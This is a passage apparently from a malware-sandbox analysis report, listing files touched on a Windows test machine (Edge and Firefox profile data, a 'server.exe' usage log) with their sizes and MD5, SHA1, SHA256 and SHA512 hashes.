                                                                                                                                                    cb1eeb2dff6329ec3cf975687bc8ebc33ad2b96191051b44680dcf9380fdb09fe891f2255b69c11c08e8ed394c5f98ea4b6d8ce581912fbf89500cda30ad39fe

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\server.exe.log

                                                                                                                                                    Filesize

                                                                                                                                                    408B

                                                                                                                                                    MD5

                                                                                                                                                    11c924dd7e95b6c1243d3dc6a6cda57d

                                                                                                                                                    SHA1

                                                                                                                                                    dc5becbb4ba7c94037c13de7163b541f4dfe0b7b

                                                                                                                                                    SHA256

                                                                                                                                                    18ebe71e164d362b1c0464dda0cb3269b2940c40abd588bde37d92c81263ba52

                                                                                                                                                    SHA512

                                                                                                                                                    dd021f43ce21d1fb35119fa9303b09281365ca676b6e944de844b397dd407cee9b17b740220bb09d024ffb6e1acf45d4c41ea4101e6cb011f7a1fa9cbf8e2432

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                    Filesize

                                                                                                                                                    152B

                                                                                                                                                    MD5

                                                                                                                                                    471bd212cd35f2fa298b584246672896

                                                                                                                                                    SHA1

                                                                                                                                                    e12bc178ca9e9f02ee72df03a15ae8fcb519eb83

                                                                                                                                                    SHA256

                                                                                                                                                    4cf2497882fdba2b918efeb86d82491d35e5d8bc557f0ae60fe0169797aa3c89

                                                                                                                                                    SHA512

                                                                                                                                                    1d0f0f9338c9fcdc6a2066a1d0217fd235da732526cf503cb7d7d7604e0e0a6defb77e2143b0bdac1fae9d211670440d2492507291cdb7c67a5decf603c6d084

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                    Filesize

                                                                                                                                                    152B

                                                                                                                                                    MD5

                                                                                                                                                    b1afd1f3bb6d3cc095633dfb658f7f9d

                                                                                                                                                    SHA1

                                                                                                                                                    469412bedd41b363cd6de9c835a98ffaa3c2a096

                                                                                                                                                    SHA256

                                                                                                                                                    a324e5e9948e4a401b870f5cfd777cce3dbd7c21e4d323f1ae59619eb5b6c77e

                                                                                                                                                    SHA512

                                                                                                                                                    d4a1827dff204d427f066b7418ad0f416331b639afd3bd94d37cb452570693357a000f4748d7a6bd98807e47d493caa662f8362bea244245903327b6f05edc78

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\46520881-d42f-41b8-892d-7f2030bfe954.tmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                    MD5

                                                                                                                                                    d2e46581ba7ecf3058e06c25fc7c9268

                                                                                                                                                    SHA1

                                                                                                                                                    fc3ae683632897c8ffacb5fe712e5a25ecfb12f5

                                                                                                                                                    SHA256

                                                                                                                                                    2830fabdf5e076c4c51d82b21855ddc95d8fa008aff61286a9fc830104ddbb55

                                                                                                                                                    SHA512

                                                                                                                                                    f1ed2596fe4e7397fcb097a6864467d9cc48340ab85455ab75754383f37fc13f848d083be04eca00ba6405cfa68c95312ffa6ca2e5220a5778cae69a7a123a67

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

                                                                                                                                                    Filesize

                                                                                                                                                    51KB

                                                                                                                                                    MD5

                                                                                                                                                    f61f0d4d0f968d5bba39a84c76277e1a

                                                                                                                                                    SHA1

                                                                                                                                                    aa3693ea140eca418b4b2a30f6a68f6f43b4beb2

                                                                                                                                                    SHA256

                                                                                                                                                    57147f08949ababe7deef611435ae418475a693e3823769a25c2a39b6ead9ccc

                                                                                                                                                    SHA512

                                                                                                                                                    6c3bd90f709bcf9151c9ed9ffea55c4f6883e7fda2a4e26bf018c83fe1cfbe4f4aa0db080d6d024070d53b2257472c399c8ac44eefd38b9445640efa85d5c487

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

                                                                                                                                                    Filesize

                                                                                                                                                    80KB

                                                                                                                                                    MD5

                                                                                                                                                    f21f7131ea3dbe2192321068243bf75e

                                                                                                                                                    SHA1

                                                                                                                                                    96056eb9191ebfde52d183575b550f570d504e23

                                                                                                                                                    SHA256

                                                                                                                                                    673613a6b1ca5ad61b67a75d9c8991e41455ae45c3d60e5105c416a0bf0dd5a1

                                                                                                                                                    SHA512

                                                                                                                                                    ee88867ecce43b50476993b0bf7d3282e5f27a368d9b03b059c4e45a4f9482419c08936c84f4ed76722882e120f23bb32aef0c3db78732915565e54f8ee50218

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

                                                                                                                                                    Filesize

                                                                                                                                                    72KB

                                                                                                                                                    MD5

                                                                                                                                                    1ad7e125f239350d92544df0734a51d1

                                                                                                                                                    SHA1

                                                                                                                                                    e02b25a73369d22396da64ffdceb781def1bd446

                                                                                                                                                    SHA256

                                                                                                                                                    7c4bf26ee480a4ef9ab7c89c27186bc6ebf3cac638810c98c145a9ce441bfa1f

                                                                                                                                                    SHA512

                                                                                                                                                    faf7a4f874707860bd83d9e3b5b9fb1d0843182f8af94d356c363b91fd226dd303b0e20318c99642adc5b47f713e9811d52a8f62ab4611fd366efa002a4b67ac

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

                                                                                                                                                    Filesize

                                                                                                                                                    93KB

                                                                                                                                                    MD5

                                                                                                                                                    55cc1e16448a516fe32056a35502f747

                                                                                                                                                    SHA1

                                                                                                                                                    5ba450a81ce5bdeaa426fbc40dfc70a12d36f24b

                                                                                                                                                    SHA256

                                                                                                                                                    4a9e17bd029bcca97446111eab3598d616376b86e38d09ef43409c151dccb81d

                                                                                                                                                    SHA512

                                                                                                                                                    5aee1a5915816b60ee6a4fbd927fe39dd522353bfd865214908b24b37fc9e76006a9cdb92fcec850f380be709bd4fc106642408a5dd9db147e23fa5f3b6b9b6b

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

                                                                                                                                                    Filesize

                                                                                                                                                    20KB

                                                                                                                                                    MD5

                                                                                                                                                    61aa8b462053d982fd7dcba3537f953f

                                                                                                                                                    SHA1

                                                                                                                                                    81c782098faad96056b75b115c3b8c53066726c1

                                                                                                                                                    SHA256

                                                                                                                                                    53c820ca7848acb86a45c299f00a007f160d4f5f8182431be6390e308f0510f8

                                                                                                                                                    SHA512

                                                                                                                                                    fa34bf0dd074afe1781b5404ef0511ffdcdbe3263d0aaffcc0fa2317a39fba4d3d6d06084a7185586a417fb43727473f84c1260bca78df56becc29c970ac8ff0

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011

                                                                                                                                                    Filesize

                                                                                                                                                    73KB

                                                                                                                                                    MD5

                                                                                                                                                    c1ce6c298a58b990d31cb7dc831fd444

                                                                                                                                                    SHA1

                                                                                                                                                    b9d25d7315ef37232d3ca0709a5bb25dac5495fe

                                                                                                                                                    SHA256

                                                                                                                                                    358ae40f558c7d14d22ebbc028f803bb57262f30dae726141c32ffea65d243b5

                                                                                                                                                    SHA512

                                                                                                                                                    98fff0c38ce4b5f5dd3d64c32837afd3e25b382cc17a9f125c1e2f63e3a2f67ff891cf48c6e037536b7d46cbb36c6c7cc8350022cd43c7378c01204178e8685a

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

                                                                                                                                                    Filesize

                                                                                                                                                    70KB

                                                                                                                                                    MD5

                                                                                                                                                    da39be84e999505921cb1fed5e9f216e

                                                                                                                                                    SHA1

                                                                                                                                                    301c9ad3efad9108a0416d81a7aa006b737b8b13

                                                                                                                                                    SHA256

                                                                                                                                                    4a89523122fabb722c27a7be116f32b3efd740cc27a1bd70ba16db63bc1bf193

                                                                                                                                                    SHA512

                                                                                                                                                    397491e24796e73e551ef1d87ec0523a080e1ea352a37c1280e66e4392bf6d4592570b94eee2c5926061c800c60e7c8d77f311c40c97a162e59e42a37d0665f1

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

                                                                                                                                                    Filesize

                                                                                                                                                    21KB

                                                                                                                                                    MD5

                                                                                                                                                    91b012d6e761baf6990ff107cd341cdb

                                                                                                                                                    SHA1

                                                                                                                                                    c92f8d73dea14611e5c86accbd9c1b6321b120ce

                                                                                                                                                    SHA256

                                                                                                                                                    6d3cc57cc9c6f29da17b071c250d93d71e323172bee5bf0162ac50ce0aa75f89

                                                                                                                                                    SHA512

                                                                                                                                                    d094e5cf28a1b6e38f70f574cb08ceaa0403162a1b790f1850ead8fb5d7ec9081c37feb4764e56dae7467b971db4ac75fcfe7b3444f3dff6e0f1094c48588bea

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

                                                                                                                                                    Filesize

                                                                                                                                                    92KB

                                                                                                                                                    MD5

                                                                                                                                                    fb4ff3d7b5115ca2811adb1eeb94f409

                                                                                                                                                    SHA1

                                                                                                                                                    196c9a3faebabe86d67838818496d12a4cb00d3b

                                                                                                                                                    SHA256

                                                                                                                                                    0ce615c6a95383c3b17a01c7359363f12744faafb78de970561d8516789ea6c7

                                                                                                                                                    SHA512

                                                                                                                                                    035d3da82b304eccbab3a10b4b223b053334203c9baf96b50025b6f961d6cb4dfbcbc8e940374f86dfa8928230b2d68dffb736be3dc1ff0cbd0de763de0a0ac7

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

                                                                                                                                                    Filesize

                                                                                                                                                    60KB

                                                                                                                                                    MD5

                                                                                                                                                    6593bbf4365fc69032f18c35ad659815

                                                                                                                                                    SHA1

                                                                                                                                                    2eb8a10b29225a9f3ac7f7f0b1bdf764984fd810

                                                                                                                                                    SHA256

                                                                                                                                                    68b332b6e43410993d7d5f96c799e84f6032ea6750d5cff6569ba2c0b6593240

                                                                                                                                                    SHA512

                                                                                                                                                    3bd0465d3b78c0650de47e985ccefd2d6160eaa863c1f4682d3884410b13a61e44aa258a732b3b61c3eccb5dfc454cb00d0c71fd088504463cd4f4e938f14b3b

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

                                                                                                                                                    Filesize

                                                                                                                                                    86KB

                                                                                                                                                    MD5

                                                                                                                                                    26fd9dd72fde39f1e30cb581e7719919

                                                                                                                                                    SHA1

                                                                                                                                                    28db5ba58dea59b22c87042bd22735c71e6879ec

                                                                                                                                                    SHA256

                                                                                                                                                    bbd1a8a6f3c1275b59192f910ce48ffe1c8ce27ad449da970004ccca6edf1c70

                                                                                                                                                    SHA512

                                                                                                                                                    5506fbf00a0ef0a9ebcdaf4b592486079d8355a3b2bf87aed88d929475a06714310eac689c3c9daf9541b5aeedfd7fb378cf8267e9c7f71e84639866c4241f6b

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

                                                                                                                                                    Filesize

                                                                                                                                                    38KB

                                                                                                                                                    MD5

                                                                                                                                                    6b2050872b3f506f6f1ecc68a40933ca

                                                                                                                                                    SHA1

                                                                                                                                                    562a7ed420264ba411c2a3f2a869a42954e60798

                                                                                                                                                    SHA256

                                                                                                                                                    32efa94175178d540606e23e239f82f3f8086eac7a571e553c7ae22bc6d46de8

                                                                                                                                                    SHA512

                                                                                                                                                    17e172cec26f37afa5b3e6bd3cfecdf692e4f4f99b05ef112ea101743123c125dc1d7aeafeefb7fa4639370f32cfa798de604f5c943f4c31b17ee3c477d833fa

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001a

                                                                                                                                                    Filesize

                                                                                                                                                    29KB

                                                                                                                                                    MD5

                                                                                                                                                    3866b102b937ed3e23f62c8f451fb3c8

                                                                                                                                                    SHA1

                                                                                                                                                    a0a15c43a2db5a581a08f480031870eafed7c33c

                                                                                                                                                    SHA256

                                                                                                                                                    3c27a64506340a3e0874866a9b91ce44f9538f81bab4ed518bb4598a43f845de

                                                                                                                                                    SHA512

                                                                                                                                                    8b61391f33aef8e0795a9c0433dc6ea92f5c64e9b476114e57e19dd096441af08a4c04a3aa8109ff6c9d9bd7a3ba2cc23ba0da553ecf34a5dab63d1e908c8f52

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001b

                                                                                                                                                    Filesize

                                                                                                                                                    71KB

                                                                                                                                                    MD5

                                                                                                                                                    4a8bb5537ab1e1af9bf8d38769571cac

                                                                                                                                                    SHA1

                                                                                                                                                    37436f4cd29bd85cbdc9d3edab6ca4cde8a703de

                                                                                                                                                    SHA256

                                                                                                                                                    8b98d07437b4aecf2287991c2f1a6f677bbd810bfb0557c5ff3be6be68d48cd2

                                                                                                                                                    SHA512

                                                                                                                                                    7c42f9dc76792b180b7f226bf811abfb0d10aa95c9da700d55e587ed3ad0069d75c7d7a058957c39edc8d9f97fe406e8254a9af9a7ae5e88a51f699e493d56ca

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

                                                                                                                                                    Filesize

                                                                                                                                                    141KB

                                                                                                                                                    MD5

                                                                                                                                                    06564399676668864e0b98b17a5f2992

                                                                                                                                                    SHA1

                                                                                                                                                    ab30c4cacaf4c6b746ceb4c1f71d438bee564192

                                                                                                                                                    SHA256

                                                                                                                                                    a25447e2ead55609c925b38b3c72b1290c58ed98cf9cc010ca21741a7f147ab5

                                                                                                                                                    SHA512

                                                                                                                                                    f0e671a03d9f4980ff6d19c77931384299e7ca76ef0c6317e583cfca70acec2740531192efc2210906cb6c188713b2b77ae30c39a188f0f4256d0d56efce5e3f

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                    Filesize

                                                                                                                                                    336B

                                                                                                                                                    MD5

                                                                                                                                                    efea6048ebffc4d812f0a3e086fafcb6

                                                                                                                                                    SHA1

                                                                                                                                                    348f6a1ffc8ba559198c6c7a50147bd70603a6ca

                                                                                                                                                    SHA256

                                                                                                                                                    68d1ff004fb1cf49d9e9ff19f3dffb9f8f6b66a24669f7ea2eccd0eab7c92aa2

                                                                                                                                                    SHA512

                                                                                                                                                    abd3dc849eaa57f34c93cdb3ad4bde359853970c3a0a3253cbe8117c264e2eeef0efcba7cc855307bc724b2b8e82a9f66d55349bdf71d9b0531428cb9936bfca

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                    Filesize

                                                                                                                                                    1KB

                                                                                                                                                    MD5

                                                                                                                                                    ad91e1d86f057b8263a8fb1554670549

                                                                                                                                                    SHA1

                                                                                                                                                    99607b3b068f64e3c6e15759b26e0d11c3853361

                                                                                                                                                    SHA256

                                                                                                                                                    8235cde27e2cff71683d4fc79a25bcddba6537a2b46fa26d2719d647f2b2138c

                                                                                                                                                    SHA512

                                                                                                                                                    7e700fb76848080432608fb1faa5f691871d170b409e9548c0d47a5d0b4b8eb03547d5122c182e1895562b3748fd6ed6f8b83585a240af9687ada69877f3b6de

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                    Filesize

                                                                                                                                                    48B

                                                                                                                                                    MD5

                                                                                                                                                    091f9a4da6da76b2563904d1601b56b2

                                                                                                                                                    SHA1

                                                                                                                                                    65ca28f2a73954f7f17a20c232a54d7c51901893

                                                                                                                                                    SHA256

                                                                                                                                                    8e8e18c6dc05a3134c5f329747767ac1392bed48e4fcabe0c2fa80ff18c28620

                                                                                                                                                    SHA512

                                                                                                                                                    3dfdcc9ef81aeb43cf0f6b874e2aea22b1bdcc9ef2447886c5af09e1bfd5b35c801ec008bdd35cf441450d048769e882ad7989adb09986414c1d276c1228d890

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

                                                                                                                                                    Filesize

                                                                                                                                                    70KB

                                                                                                                                                    MD5

                                                                                                                                                    e5e3377341056643b0494b6842c0b544

                                                                                                                                                    SHA1

                                                                                                                                                    d53fd8e256ec9d5cef8ef5387872e544a2df9108

                                                                                                                                                    SHA256

                                                                                                                                                    e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

                                                                                                                                                    SHA512

                                                                                                                                                    83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_3

                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                    MD5

                                                                                                                                                    41876349cb12d6db992f1309f22df3f0

                                                                                                                                                    SHA1

                                                                                                                                                    5cf26b3420fc0302cd0a71e8d029739b8765be27

                                                                                                                                                    SHA256

                                                                                                                                                    e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

                                                                                                                                                    SHA512

                                                                                                                                                    e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                    MD5

                                                                                                                                                    156d6db368b448eca7258f64afd5a05f

                                                                                                                                                    SHA1

                                                                                                                                                    ab3868362b0d09a2f5abd16b80a20bc87e456997

                                                                                                                                                    SHA256

                                                                                                                                                    62254c4e092cc2c57b745c7a3864cb735086727a51412356998b4d557807ac2f

                                                                                                                                                    SHA512

                                                                                                                                                    3083aab042bfd15cc375d3321e706b612e1e88ac3415ca109cc49d1ca3cc9c9792447d1b2d90aac13f2eb5e1481c84b9bef542b596069e69920b78fe9d028267

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe59eae3.TMP

                                                                                                                                                    Filesize

                                                                                                                                                    59B

                                                                                                                                                    MD5

                                                                                                                                                    2800881c775077e1c4b6e06bf4676de4

                                                                                                                                                    SHA1

                                                                                                                                                    2873631068c8b3b9495638c865915be822442c8b

                                                                                                                                                    SHA256

                                                                                                                                                    226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

                                                                                                                                                    SHA512

                                                                                                                                                    e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                    Filesize

                                                                                                                                                    5KB

                                                                                                                                                    MD5

                                                                                                                                                    69dd3850de7216e8c5eb4b2d0d0ab808

                                                                                                                                                    SHA1

                                                                                                                                                    62e3f953a86d2e6561446bbdc736f54c775a0a2e

                                                                                                                                                    SHA256

                                                                                                                                                    01187f4f3af4c258117a716f2e69ad6b07bd59f73121eb9e67fdf0f275e0ef41

                                                                                                                                                    SHA512

                                                                                                                                                    255b0b6401fab56fbef681c625102b4f64e544e3a7dbd4216d8b4dbf5a25d1fdfb504de0d5b5fcfc24257e6b2f8519f92263f320cd5974ea3b49f56d8a48970b

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                    Filesize

                                                                                                                                                    5KB

                                                                                                                                                    MD5

                                                                                                                                                    f7de8905fb9ac7e91af0c5285f81f188

                                                                                                                                                    SHA1

                                                                                                                                                    df211767f5e4c2c22537372f51317464465e4587

                                                                                                                                                    SHA256

                                                                                                                                                    f6a478e9ae4a46900ab5eaaa3d082d727cb526f295a0eee3fe10f07f2ac51619

                                                                                                                                                    SHA512

                                                                                                                                                    de4c502d5a1749fc084852844b87468c130e3d7d2d4116fd74f5c42e7c808b8a401e2f0f2638abbbcac367199a19df974db51732d9a724338ae5bfa00303f3f9

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                    Filesize

                                                                                                                                                    5KB

                                                                                                                                                    MD5

                                                                                                                                                    1a973c5586000c87abdfacefac344381

                                                                                                                                                    SHA1

                                                                                                                                                    59957f0c777ceebd4546bd52b5d830be2a877b9c

                                                                                                                                                    SHA256

                                                                                                                                                    2bff80ab5ad9f77195720490b4ad3712bb404085dcce8665c9ff40b3dc1892a8

                                                                                                                                                    SHA512

                                                                                                                                                    1cdf35c9492869041d34bc728536e85f98390c5a5a579237e9b4a538737c61de7f09973a2a57f3fa26c4d904776b558b341a9cb2f4ed7caaa0604a844d048e00

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                    Filesize

                                                                                                                                                    7KB

                                                                                                                                                    MD5

                                                                                                                                                    bf9867a2a976e37385ac917ea6cb6546

                                                                                                                                                    SHA1

                                                                                                                                                    b35429b8f56df61c34493e64323fbb7494d33845

                                                                                                                                                    SHA256

                                                                                                                                                    410008569a2a563d5a6b12ed808f6631010cae29955c0cce9129d1ce88489916

                                                                                                                                                    SHA512

                                                                                                                                                    369d30bf524faf87110d63f92fd003b77eafe83e26dc0ebdd54d7ec826f8325cf1ec51e3212b619ea7eba6853b1f43c73bde47f8a09a93e51cc7d9a3ad91cd63

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                    Filesize

                                                                                                                                                    24KB

                                                                                                                                                    MD5

                                                                                                                                                    ee09e9ed5bea3b88cdf2c8a7152629c7

                                                                                                                                                    SHA1

                                                                                                                                                    81af46cdc5528a7e046fe3d29f9148d530216b96

                                                                                                                                                    SHA256

                                                                                                                                                    1aacb22be4601a731ef428ea51dd438b1543243998ea5666201b5f2d47c83183

                                                                                                                                                    SHA512

                                                                                                                                                    edbae717968525dbaef599670724bcd5f36fd0964429471084e6d6a9fa964931bb7fa90ab12783e7876c372a89c8e18bf8a180d94871db0e9a91bec15f809244

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                    Filesize

                                                                                                                                                    24KB

                                                                                                                                                    MD5

                                                                                                                                                    3a097c21c04d45f282202d0133201f4b

                                                                                                                                                    SHA1

                                                                                                                                                    d236053493daa634b6d56db6f76ed57de869299a

                                                                                                                                                    SHA256

                                                                                                                                                    da422ac15271b8367827e5fd56e8536bd94f63b963bb12e941f55ac03d9fb8f3

                                                                                                                                                    SHA512

                                                                                                                                                    99c74bd2215156a329e9b73441e1cda4b6c38fc9d6cca3830413118f2df24a112048e871cd48e0e42216e1787e2ad1f1db84ebd8744398059934f5ec318798ab

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                    Filesize

                                                                                                                                                    1KB

                                                                                                                                                    MD5

                                                                                                                                                    5f0fc66eed98b704d37af2b637f07aee

                                                                                                                                                    SHA1

                                                                                                                                                    ff919650995739e2eb06aca7fb8dbd6b79b73f24

                                                                                                                                                    SHA256

                                                                                                                                                    e5d3d77ad032a68ba5c08b86b5ac73432b0c83456edf11e45c2282142175a031

                                                                                                                                                    SHA512

                                                                                                                                                    ae82f474ec80ce6c21654a66465e46d615933178833d0e66304babafe5d3b8e0c655ae3e80e4a70f02fc1adb866e86340c6ac80393b4b6cedf83c58badced683

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                    Filesize

                                                                                                                                                    1KB

                                                                                                                                                    MD5

                                                                                                                                                    b5e93d46a6de89611394be11139763fc

                                                                                                                                                    SHA1

                                                                                                                                                    0175801cbca10d4dff4da237bc328c63a3627155

                                                                                                                                                    SHA256

                                                                                                                                                    2cd64ae2840d4968e4e06ae085ff5ef45a14879f1e967d50d16c8cee57287fbf

                                                                                                                                                    SHA512

                                                                                                                                                    0b2c28215503bdf39f02300af9444fd828ba163941599b596c00322d1fb35f9b0f87cd90d659410965fc4a6cbcc618d7690048731de09b2143131bf6bae0ba0c

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe59dac6.TMP

                                                                                                                                                    Filesize

                                                                                                                                                    370B

                                                                                                                                                    MD5

                                                                                                                                                    57dc2c5eed00a16026499f763948fd93

                                                                                                                                                    SHA1

                                                                                                                                                    6c61e960193147803bbf9076a108b1b5858d8c5d

                                                                                                                                                    SHA256

                                                                                                                                                    99e018d052f92c1f0130f04909bc1d7adf0081a89b14769802fedda3736c1b31

                                                                                                                                                    SHA512

                                                                                                                                                    1d1ca262388de29f5d2465b745c59e42783873ac18b756247d2239320f97ab43c01e4f658a39116d82db0b87603af90225d4779bdb57374762ddf47f072f2b67

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                    Filesize

                                                                                                                                                    16B

                                                                                                                                                    MD5

                                                                                                                                                    206702161f94c5cd39fadd03f4014d98

                                                                                                                                                    SHA1

                                                                                                                                                    bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                                                                                    SHA256

                                                                                                                                                    1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                                                                                    SHA512

                                                                                                                                                    0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

                                                                                                                                                    Filesize

                                                                                                                                                    41B

                                                                                                                                                    MD5

                                                                                                                                                    5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                    SHA1

                                                                                                                                                    d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                    SHA256

                                                                                                                                                    f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                    SHA512

                                                                                                                                                    de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

                                                                                                                                                    Filesize

                                                                                                                                                    16B

                                                                                                                                                    MD5

                                                                                                                                                    46295cac801e5d4857d09837238a6394

                                                                                                                                                    SHA1

                                                                                                                                                    44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                    SHA256

                                                                                                                                                    0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                    SHA512

                                                                                                                                                    8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_2

                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                    MD5

                                                                                                                                                    0962291d6d367570bee5454721c17e11

                                                                                                                                                    SHA1

                                                                                                                                                    59d10a893ef321a706a9255176761366115bedcb

                                                                                                                                                    SHA256

                                                                                                                                                    ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                                                                                                                                                    SHA512

                                                                                                                                                    f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                    Filesize

                                                                                                                                                    10KB

                                                                                                                                                    MD5

                                                                                                                                                    e2a41b447d4323a89bdacc6bdd62924b

                                                                                                                                                    SHA1

                                                                                                                                                    36f45608a5f9163418db8b4dd7c187e4f0724eab

                                                                                                                                                    SHA256

                                                                                                                                                    acfc13563c45cb8b988673f7feceb9c0dd66ec1519b1e49cf9cd89a3be014955

                                                                                                                                                    SHA512

                                                                                                                                                    94702d3df05a5ad31b1987252b80c49df60add62d537951fe7110d89f058498273558ea47414fcbf84912d805b2ccfde3c4fd65b171fa36c62d49e8bf8e2f351

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                    MD5

                                                                                                                                                    bfd22aff0e100751e17adbcdaff1e6fa

                                                                                                                                                    SHA1

                                                                                                                                                    7a3c7d3414e1eed8ec03c5a6e8661ae3d04399ce

                                                                                                                                                    SHA256

                                                                                                                                                    5853c0d5e666213f244b59b36f4e755c7487d7ba597030b7ada0f030995fc058

                                                                                                                                                    SHA512

                                                                                                                                                    8f6af578c35e501b5d785fb95d365031dcf04dac95d78fa36d98bed45b1f31b5a36587cda65e29b1d2bef7a1fc799b292c482413719e03abca19cb661da48d51

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\dg3cjlpy.default-release\activity-stream.discovery_stream.json

                                                                                                                                                    Filesize

                                                                                                                                                    21KB

                                                                                                                                                    MD5

                                                                                                                                                    5dd9b83443a084fdaae8e39167dd1f9d

                                                                                                                                                    SHA1

